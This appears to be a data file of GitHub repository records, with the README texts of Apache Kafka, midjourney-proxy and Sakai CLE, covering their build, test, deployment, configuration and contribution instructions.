Apache Kafka ================= See our [web site](https://kafka.apache.org) for details on the project. You need to have [Java](http://www.oracle.com/technetwork/java/javase/downloads/index.html) installed. We build and test Apache Kafka with Java 8, 11, 17 and 21. We set the `release` parameter in javac and scalac to `8` to ensure the generated binaries are compatible with Java 8 or higher (independently of the Java version used for compilation). Java 8 support project-wide has been deprecated since Apache Kafka 3.0, Java 11 support for the broker and tools has been deprecated since Apache Kafka 3.7 and removal of both is planned for Apache Kafka 4.0 ( see [KIP-750](https://cwiki.apache.org/confluence/pages/viewpage.action?pageId=181308223) and [KIP-1013](https://cwiki.apache.org/confluence/pages/viewpage.action?pageId=284789510) for more details). Scala 2.12 and 2.13 are supported and 2.13 is used by default. Scala 2.12 support has been deprecated since Apache Kafka 3.0 and will be removed in Apache Kafka 4.0 (see [KIP-751](https://cwiki.apache.org/confluence/pages/viewpage.action?pageId=181308218) for more details). See below for how to use a specific Scala version or all of the supported Scala versions. ### Build a jar and run it ### ./gradlew jar Follow instructions in https://kafka.apache.org/quickstart ### Build source jar ### ./gradlew srcJar ### Build aggregated javadoc ### ./gradlew aggregatedJavadoc ### Build javadoc and scaladoc ### ./gradlew javadoc ./gradlew javadocJar # builds a javadoc jar for each module ./gradlew scaladoc ./gradlew scaladocJar # builds a scaladoc jar for each module ./gradlew docsJar # builds both (if applicable) javadoc and scaladoc jars for each module ### Run unit/integration tests ### ./gradlew test # runs both unit and integration tests ./gradlew unitTest ./gradlew integrationTest ### Force re-running tests without code change ### ./gradlew test --rerun ./gradlew unitTest --rerun ./gradlew integrationTest --rerun ### Running a particular unit/integration test ### ./gradlew clients:test --tests RequestResponseTest ### Repeatedly running a particular unit/integration test ### I=0; while ./gradlew clients:test --tests RequestResponseTest --rerun --fail-fast; do (( I=$I+1 )); echo "Completed run: $I"; sleep 1; done ### Running a particular test method within a unit/integration test ### ./gradlew core:test --tests kafka.api.ProducerFailureHandlingTest.testCannotSendToInternalTopic ./gradlew clients:test --tests org.apache.kafka.clients.MetadataTest.testTimeToNextUpdate ### Running a particular unit/integration test with log4j output ### By default, there will be only small number of logs output while testing. You can adjust it by changing the `log4j.properties` file in the module's `src/test/resources` directory. For example, if you want to see more logs for clients project tests, you can modify [the line](https://github.com/apache/kafka/blob/trunk/clients/src/test/resources/log4j.properties#L21) in `clients/src/test/resources/log4j.properties` to `log4j.logger.org.apache.kafka=INFO` and then run: ./gradlew cleanTest clients:test --tests NetworkClientTest And you should see `INFO` level logs in the file under the `clients/build/test-results/test` directory. ### Specifying test retries ### By default, each failed test is retried once up to a maximum of five retries per test run. Tests are retried at the end of the test task. 
Adjust these parameters in the following way: ./gradlew test -PmaxTestRetries=1 -PmaxTestRetryFailures=5 See [Test Retry Gradle Plugin](https://github.com/gradle/test-retry-gradle-plugin) for more details. ### Generating test coverage reports ### Generate coverage reports for the whole project: ./gradlew reportCoverage -PenableTestCoverage=true -Dorg.gradle.parallel=false Generate coverage for a single module, i.e.: ./gradlew clients:reportCoverage -PenableTestCoverage=true -Dorg.gradle.parallel=false ### Building a binary release gzipped tar ball ### ./gradlew clean releaseTarGz The release file can be found inside `./core/build/distributions/`. ### Building auto generated messages ### Sometimes it is only necessary to rebuild the RPC auto-generated message data when switching between branches, as they could fail due to code changes. You can just run: ./gradlew processMessages processTestMessages ### Running a Kafka broker in KRaft mode Using compiled files: KAFKA_CLUSTER_ID="$(./bin/kafka-storage.sh random-uuid)" ./bin/kafka-storage.sh format -t $KAFKA_CLUSTER_ID -c config/kraft/server.properties ./bin/kafka-server-start.sh config/kraft/server.properties Using docker image: docker run -p 9092:9092 apache/kafka:3.7.0 ### Running a Kafka broker in ZooKeeper mode Using compiled files: ./bin/zookeeper-server-start.sh config/zookeeper.properties ./bin/kafka-server-start.sh config/server.properties >Since ZooKeeper mode is already deprecated and planned to be removed in Apache Kafka 4.0, the docker image only supports running in KRaft mode ### Cleaning the build ### ./gradlew clean ### Running a task with one of the Scala versions available (2.12.x or 2.13.x) ### *Note that if building the jars with a version other than 2.13.x, you need to set the `SCALA_VERSION` variable or change it in `bin/kafka-run-class.sh` to run the quick start.* You can pass either the major version (eg 2.12) or the full version (eg 2.12.7): ./gradlew -PscalaVersion=2.12 jar ./gradlew -PscalaVersion=2.12 test ./gradlew -PscalaVersion=2.12 releaseTarGz ### Running a task with all the scala versions enabled by default ### Invoke the `gradlewAll` script followed by the task(s): ./gradlewAll test ./gradlewAll jar ./gradlewAll releaseTarGz ### Running a task for a specific project ### This is for `core`, `examples` and `clients` ./gradlew core:jar ./gradlew core:test Streams has multiple sub-projects, but you can run all the tests: ./gradlew :streams:testAll ### Listing all gradle tasks ### ./gradlew tasks ### Building IDE project #### *Note that this is not strictly necessary (IntelliJ IDEA has good built-in support for Gradle projects, for example).* ./gradlew eclipse ./gradlew idea The `eclipse` task has been configured to use `${project_dir}/build_eclipse` as Eclipse's build directory. Eclipse's default build directory (`${project_dir}/bin`) clashes with Kafka's scripts directory and we don't use Gradle's build directory to avoid known issues with this configuration. 
### Publishing the jar for all versions of Scala and for all projects to maven ### The recommended command is: ./gradlewAll publish For backwards compatibility, the following also works: ./gradlewAll uploadArchives Please note for this to work you should create/update `${GRADLE_USER_HOME}/gradle.properties` (typically, `~/.gradle/gradle.properties`) and assign the following variables mavenUrl= mavenUsername= mavenPassword= signing.keyId= signing.password= signing.secretKeyRingFile= ### Publishing the streams quickstart archetype artifact to maven ### For the Streams archetype project, one cannot use gradle to upload to maven; instead the `mvn deploy` command needs to be called at the quickstart folder: cd streams/quickstart mvn deploy Please note for this to work you should create/update user maven settings (typically, `${USER_HOME}/.m2/settings.xml`) to assign the following variables <settings xmlns="http://maven.apache.org/SETTINGS/1.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/SETTINGS/1.0.0 https://maven.apache.org/xsd/settings-1.0.0.xsd"> ... <servers> ... <server> <id>apache.snapshots.https</id> <username>${maven_username}</username> <password>${maven_password}</password> </server> <server> <id>apache.releases.https</id> <username>${maven_username}</username> <password>${maven_password}</password> </server> ... </servers> ... ### Installing ALL the jars to the local Maven repository ### The recommended command to build for both Scala 2.12 and 2.13 is: ./gradlewAll publishToMavenLocal For backwards compatibility, the following also works: ./gradlewAll install ### Installing specific projects to the local Maven repository ### ./gradlew -PskipSigning=true :streams:publishToMavenLocal If needed, you can specify the Scala version with `-PscalaVersion=2.13`. ### Building the test jar ### ./gradlew testJar ### Running code quality checks ### There are two code quality analysis tools that we regularly run, spotbugs and checkstyle. #### Checkstyle #### Checkstyle enforces a consistent coding style in Kafka. You can run checkstyle using: ./gradlew checkstyleMain checkstyleTest The checkstyle warnings will be found in `reports/checkstyle/reports/main.html` and `reports/checkstyle/reports/test.html` files in the subproject build directories. They are also printed to the console. The build will fail if Checkstyle fails. #### Spotbugs #### Spotbugs uses static analysis to look for bugs in the code. You can run spotbugs using: ./gradlew spotbugsMain spotbugsTest -x test The spotbugs warnings will be found in `reports/spotbugs/main.html` and `reports/spotbugs/test.html` files in the subproject build directories. Use -PxmlSpotBugsReport=true to generate an XML report instead of an HTML one. ### JMH microbenchmarks ### We use [JMH](https://openjdk.java.net/projects/code-tools/jmh/) to write microbenchmarks that produce reliable results in the JVM. See [jmh-benchmarks/README.md](https://github.com/apache/kafka/blob/trunk/jmh-benchmarks/README.md) for details on how to run the microbenchmarks. ### Dependency Analysis ### The gradle [dependency debugging documentation](https://docs.gradle.org/current/userguide/viewing_debugging_dependencies.html) mentions using the `dependencies` or `dependencyInsight` tasks to debug dependencies for the root project or individual subprojects. 
Alternatively, use the `allDeps` or `allDepInsight` tasks for recursively iterating through all subprojects: ./gradlew allDeps ./gradlew allDepInsight --configuration runtimeClasspath --dependency com.fasterxml.jackson.core:jackson-databind These take the same arguments as the builtin variants. ### Determining if any dependencies could be updated ### ./gradlew dependencyUpdates ### Common build options ### The following options should be set with a `-P` switch, for example `./gradlew -PmaxParallelForks=1 test`. * `commitId`: sets the build commit ID as .git/HEAD might not be correct if there are local commits added for build purposes. * `mavenUrl`: sets the URL of the maven deployment repository (`file://path/to/repo` can be used to point to a local repository). * `maxParallelForks`: maximum number of test processes to start in parallel. Defaults to the number of processors available to the JVM. * `maxScalacThreads`: maximum number of worker threads for the scalac backend. Defaults to the lowest of `8` and the number of processors available to the JVM. The value must be between 1 and 16 (inclusive). * `ignoreFailures`: ignore test failures from junit * `showStandardStreams`: shows standard out and standard error of the test JVM(s) on the console. * `skipSigning`: skips signing of artifacts. * `testLoggingEvents`: unit test events to be logged, separated by comma. For example `./gradlew -PtestLoggingEvents=started,passed,skipped,failed test`. * `xmlSpotBugsReport`: enable XML reports for spotBugs. This also disables HTML reports as only one can be enabled at a time. * `maxTestRetries`: maximum number of retries for a failing test case. * `maxTestRetryFailures`: maximum number of test failures before retrying is disabled for subsequent tests. * `enableTestCoverage`: enables test coverage plugins and tasks, including bytecode enhancement of classes required to track said coverage. Note that this introduces some overhead when running tests and hence why it's disabled by default (the overhead varies, but 15-20% is a reasonable estimate). * `keepAliveMode`: configures the keep alive mode for the Gradle compilation daemon - reuse improves start-up time. The values should be one of `daemon` or `session` (the default is `daemon`). `daemon` keeps the daemon alive until it's explicitly stopped while `session` keeps it alive until the end of the build session. This currently only affects the Scala compiler, see https://github.com/gradle/gradle/pull/21034 for a PR that attempts to do the same for the Java compiler. * `scalaOptimizerMode`: configures the optimizing behavior of the scala compiler, the value should be one of `none`, `method`, `inline-kafka` or `inline-scala` (the default is `inline-kafka`). `none` is the scala compiler default, which only eliminates unreachable code. `method` also includes method-local optimizations. `inline-kafka` adds inlining of methods within the kafka packages. Finally, `inline-scala` also includes inlining of methods within the scala library (which avoids lambda allocations for methods like `Option.exists`). `inline-scala` is only safe if the Scala library version is the same at compile time and runtime. Since we cannot guarantee this for all cases (for example, users may depend on the kafka jar for integration tests where they may include a scala library with a different version), we don't enable it by default. See https://www.lightbend.com/blog/scala-inliner-optimizer for more details. ### Running system tests ### See [tests/README.md](tests/README.md). 
### Running in Vagrant ### See [vagrant/README.md](vagrant/README.md). ### Contribution ### Apache Kafka is interested in building the community; we would welcome any thoughts or [patches](https://issues.apache.org/jira/browse/KAFKA). You can reach us [on the Apache mailing lists](http://kafka.apache.org/contact.html). To contribute follow the instructions here: * https://kafka.apache.org/contributing.html
0
novicezk/midjourney-proxy
Proxies the Discord channel for MidJourney to enable API-based calls for AI drawing
midjourney midjourney-api
<div align="center"> <h1 align="center">midjourney-proxy</h1> English | [中文](./README_CN.md) Proxy the Discord channel for MidJourney to enable API-based calls for AI drawing [![GitHub release](https://img.shields.io/static/v1?label=release&message=v2.6.1&color=blue)](https://www.github.com/novicezk/midjourney-proxy) [![License](https://img.shields.io/badge/license-Apache%202-4EB1BA.svg)](https://www.apache.org/licenses/LICENSE-2.0.html) </div> ## Main Functions - [x] Supports Imagine instructions and related actions - [x] Supports adding image base64 as a placeholder when using the Imagine command - [x] Supports Blend (image blending) and Describe (image to text) commands - [x] Supports real-time progress tracking of tasks - [x] Supports translation of Chinese prompts, requires configuration of Baidu Translate or GPT - [x] Prompt sensitive word pre-detection, supports override adjustment - [x] User-token connects to WSS (WebSocket Secure), allowing access to error messages and full functionality - [x] Supports multi-account configuration, with each account able to set up corresponding task queues **🚀 For more features, please refer to [midjourney-proxy-plus](https://github.com/litter-coder/midjourney-proxy-plus)** > - [x] Supports all the features of the open-source version > - [x] Supports Shorten (prompt analysis) command > - [x] Supports focus shifting: Pan ⬅️ ➡️ ⬆️ ⬇️ > - [x] Supports image zooming: Zoom 🔍 > - [x] Supports local redrawing: Vary (Region) 🖌 > - [x] Supports nearly all associated button actions and the 🎛️ Remix mode > - [x] Supports retrieving the seed value of images > - [x] Account pool persistence, dynamic maintenance > - [x] Supports retrieving account /info and /settings information > - [x] Account settings configuration > - [x] Supports Niji bot robot > - [x] Supports InsightFace face replacement robot > - [x] Embedded management dashboard page ## Prerequisites for use 1. Register and subscribe to MidJourney, create `your own server and channel`, refer to https://docs.midjourney.com/docs/quick-start 2. Obtain user Token, server ID, channel ID: [Method of acquisition](./docs/discord-params.md) ## Quick Start 1. `Railway`: Based on the Railway platform, no need for your own server: [Deployment method](./docs/railway-start.md) ; If Railway is not available, you can start using Zeabur instead. 2. `Zeabur`: Based on the Zeabur platform, no need for your own server: [Deployment method](./docs/zeabur-start.md) 3. `Docker`: Start using Docker on a server or locally: [Deployment method](./docs/docker-start.md) ## Local development - Depends on Java 17 and Maven - Change configuration items: Edit src/main/resources/application.yml - Project execution: Start the main function of ProxyApplication - After changing the code, build the image: Uncomment VOLUME in the Dockerfile, then execute `docker build . -t midjourney-proxy` ## Configuration items - mj.accounts: Refer to [Account pool configuration](./docs/config.md#%E8%B4%A6%E5%8F%B7%E6%B1%A0%E9%85%8D%E7%BD%AE%E5%8F%82%E8%80%83) - mj.task-store.type: Task storage method, default is in_memory (in memory, lost after restart), Redis is an alternative option. - mj.task-store.timeout: Task storage expiration time, tasks are deleted after expiration, default is 30 days. - mj.api-secret: API key, if left empty, authentication is not enabled; when calling the API, you need to add the request header 'mj-api-secret'. 
- mj.translate-way: The method for translating Chinese prompts into English, options include null (default), Baidu, or GPT. - For more configuration options, see [Configuration items](./docs/config.md) ## Related documentation 1. [API Interface Description](./docs/api.md) 2. [Version Update Log](https://github.com/novicezk/midjourney-proxy/wiki/%E6%9B%B4%E6%96%B0%E8%AE%B0%E5%BD%95) ## Precautions 1. Frequent image generation and similar behaviors may trigger warnings on your Midjourney account. Please use with caution. 2. For common issues and solutions, see [Wiki / FAQ](https://github.com/novicezk/midjourney-proxy/wiki/FAQ) 3. Interested friends are also welcome to join the discussion group. If the group is full from scanning the code, you can add the administrator’s WeChat to be invited into the group. Please remark: mj join group. <img src="https://raw.githubusercontent.com/novicezk/midjourney-proxy/main/docs/manager-qrcode.png" width="220" alt="微信二维码"/> ## Application Project If you have a project that depends on this one and is open source, feel free to contact the author to be added here for display. - [wechat-midjourney](https://github.com/novicezk/wechat-midjourney) : A proxy WeChat client that connects to MidJourney, intended only as an example application scenario, will no longer be updated. - [chatgpt-web-midjourney-proxy](https://github.com/Dooy/chatgpt-web-midjourney-proxy) : chatgpt web, midjourney, gpts,tts, whisper A complete UI solution - [chatnio](https://github.com/Deeptrain-Community/chatnio) : The next-generation AI one-stop solution for B/C end, an aggregated model platform with exquisite UI and powerful functions - [new-api](https://github.com/Calcium-Ion/new-api) : An API interface management and distribution system compatible with the Midjourney Proxy - [stable-diffusion-mobileui](https://github.com/yuanyuekeji/stable-diffusion-mobileui) : SDUI, based on this interface and SD (System Design), can be packaged with one click to generate H5 and mini-programs. - [MidJourney-Web](https://github.com/ConnectAI-E/MidJourney-Web) : 🍎 Supercharged Experience For MidJourney On Web UI ## Open API Provides unofficial MJ/SD open API, add administrator WeChat for inquiries, please remark: api ## Others If you find this project helpful, please consider giving it a star. [![Star History Chart](https://api.star-history.com/svg?repos=novicezk/midjourney-proxy&type=Date)](https://star-history.com/#novicezk/midjourney-proxy&Date)
0
sakaiproject/sakai
Sakai is a freely available, feature-rich technology solution for learning, teaching, research and collaboration. Sakai is an open source software suite developed by a diverse and global adopter community.
education hacktoberfest java lms sakai sakai-cle tomcat vle
# Sakai Collaboration and Learning Environment (Sakai CLE) This is the source code for the Sakai CLE. The master branch is the most current development release, Sakai 24. The other branches are currently or previously supported releases. See below for more information on the release plan and support schedule. ## Building [![Build Status](https://travis-ci.org/sakaiproject/sakai.svg?branch=master)](https://travis-ci.org/sakaiproject/sakai) [![Codacy Badge](https://api.codacy.com/project/badge/Grade/c68908d6bc044e95b453bae7ddcbad4a)](https://www.codacy.com/app/sakaiproject/sakai?utm_source=github.com&amp;utm_medium=referral&amp;utm_content=sakaiproject/sakai&amp;utm_campaign=Badge_Grade) This is the "Mini Quick Start" for more complete steps to get Sakai configured please look at [this guide on the wiki](https://github.com/sakaiproject/sakai/wiki/Quick-Start-from-Source). To build Sakai you need Java 1.8. Once you have, clone a copy of this repository you can build it by running (or `./mvnw install` if you don't have Maven installed): ``` mvn install ``` ## Running Sakai runs on Apache Tomcat 9. Download the latest version from http://tomcat.apache.org and extract the archive. *Note: Sakai does not work with Tomcat installed via a package from apt-get, yum or other package managers.* You **must** configure Tomcat according to the instructions on this page: https://sakaiproject.atlassian.net/wiki/spaces/DOC/pages/17310646930/Sakai+21+Install+Guide+Source When you are done, deploy Sakai to Tomcat: ``` mvn clean install sakai:deploy -Dmaven.tomcat.home=/path/to/your/tomcat ``` Now start Tomcat: ``` cd /path/to/your/tomcat/bin ./startup.sh && tail -f ../logs/catalina.out ``` Once Sakai has started up (it usually takes around 30 seconds), open your browser and navigate to http://localhost:8080/portal ## Licensing Sakai is licensed under the [Educational Community License version 2.0](http://opensource.org/licenses/ECL-2.0) Sakai is an [Apereo Foundation](http://www.apereo.org) project and follows the Foundation's guidelines and requirements for [Contributor License Agreements](https://www.apereo.org/licensing). ## Contributing See [our dedicated page](CONTRIBUTING.md) for more information on contributing to Sakai. ## Bugs For filing bugs against Sakai please use our Jira instance: https://jira.sakaiproject.org/ ## Nightly servers For testing out the latest builds go to the [nightly server page](http://nightly2.sakaiproject.org) ## Get in touch If you have any questions, please join the Sakai developer mailing list: To subscribe send an email to sakai-dev+subscribe@apereo.org To see a full list of Sakai email lists and other communication channels, please check out this Sakai wiki page: https://confluence.sakaiproject.org/display/PMC/Sakai+email+lists If you want more immediate response during M-F typical business hours you could try our Slack channels. https://apereo.slack.com/signup If you can't find your "at institution.edu" on the Apereo signup page then send an email requesting access for yourself and your institution either to sakai-qa-planners@apereo.org or sakaicoordinator@apereo.org. ## Community supported versions These versions are actively supported by the community. 
Sakai 23.1 ([release](http://source.sakaiproject.org/release/23.1/) | [fixes](https://confluence.sakaiproject.org/display/DOC/23.1+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+23+Release+Notes)) Sakai 22.4 ([release](http://source.sakaiproject.org/release/22.4/) | [fixes](https://confluence.sakaiproject.org/display/DOC/22.4+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+22+Release+Notes)) ## Previous community versions which are no longer supported These versions are no longer supported by the community and will only receive security changes. Sakai 21.5 ([release](http://source.sakaiproject.org/release/21.5/) | [fixes](https://confluence.sakaiproject.org/display/DOC/21.5+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+21+Release+Notes)) Sakai 20.6 ([release](http://source.sakaiproject.org/release/20.6/) | [fixes](https://confluence.sakaiproject.org/display/DOC/20.6+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+20+Release+Notes)) Sakai 19.6 ([release](http://source.sakaiproject.org/release/19.6/) | [fixes](https://confluence.sakaiproject.org/display/DOC/19.6+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+19+Release+Notes)) Sakai 12.7 ([release](http://source.sakaiproject.org/release/12.7/) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+12+Release+Notes)) Sakai 11.4 ([release](http://source.sakaiproject.org/release/11.4/)) For full history of supported releases please see our [release information on confluence](https://confluence.sakaiproject.org/display/DOC/Sakai+Release+Date+list). ## Under Development [Sakai 23.2](https://confluence.sakaiproject.org/display/REL/Sakai+23+Straw+person) is the current development release of Sakai 23. It is expected to release Q2 2024. [Sakai 22.5](https://confluence.sakaiproject.org/display/REL/Sakai+22+Straw+person) is the current development release of Sakai 22. It is expected to release Q2 2024. ## Accessibility [The Sakai Accessibility Working Group](https://confluence.sakaiproject.org/display/2ACC/Accessibility+Working+Group) is responsible for ensuring that the Sakai framework and its tools are accessible to persons with disabilities. [The Sakai Ra11y plan](https://confluence.sakaiproject.org/display/2ACC/rA11y+Plan) is working towards a VPAT and/or a WCAG2 certification. CKSource has created a GPL licensed open source version of their [Accessibility Checker](https://cksource.com/ckeditor/services#accessibility-checker) that lets you inspect the accessibility level of content created in CKEditor and immediately solve any accessibility issues that are found. CKEditor is the open source rich text editor used throughout Sakai. While the Accessibility Checker, due to the GPL license, can not be bundled with Sakai, it can be used with Sakai and the A11y group has created [instructions](https://confluence.sakaiproject.org/display/2ACC/CKEditor+Accessibility+Checker) to help you. ## Skinning Sakai Documentation on how to alter the Sakai skin (look and feel) is here https://github.com/sakaiproject/sakai/tree/master/library ## Translating Sakai Translation, internationalization and localization of the Sakai project are coordinated by the Sakai Internationalization/localization community. This community maintains a publicly-accessible report that tracks what percentage of Sakai has been translated into various global languages and dialects. 
If the software is not yet available in your language, you can translate it with support from the broader Sakai Community to assist you. From its inception, the Sakai project has been envisioned and designed for global use. Complete or majority-complete translations of Sakai are available in the languages listed below. ### Supported languages | Locale | Language| | ------ | ------ | | en_US | English (Default) | | ca_ES | Catalán | | de_DE | German | | es_ES | Español | | eu | Euskera | | fa_IR | Farsi | | fr_FR | Français | | hi_IN | Hindi | | ja_JP | Japanese | | mn | Mongolian | | pt_BR | Portuguese (Brazil) | | sv_SE | Swedish | | tr_TR | Turkish | | zh_CN | Chinese | | ar | Arabic | | ro_RO | Romanian | | bg | Bulgarian | | sr | Serbian | ### Other languages Other languages have been declared legacy in Sakai 19 and have been moved to [Sakai Contrib as language packs](https://github.com/sakaicontrib/legacy-language-packs). ## Community (contrib) tools A number of institutions have written additional tools for Sakai that they use in their local installations, but are not yet in an official release of Sakai. These are being collected at https://github.com/sakaicontrib where you will find information about each one. You might find just the thing you are after!
0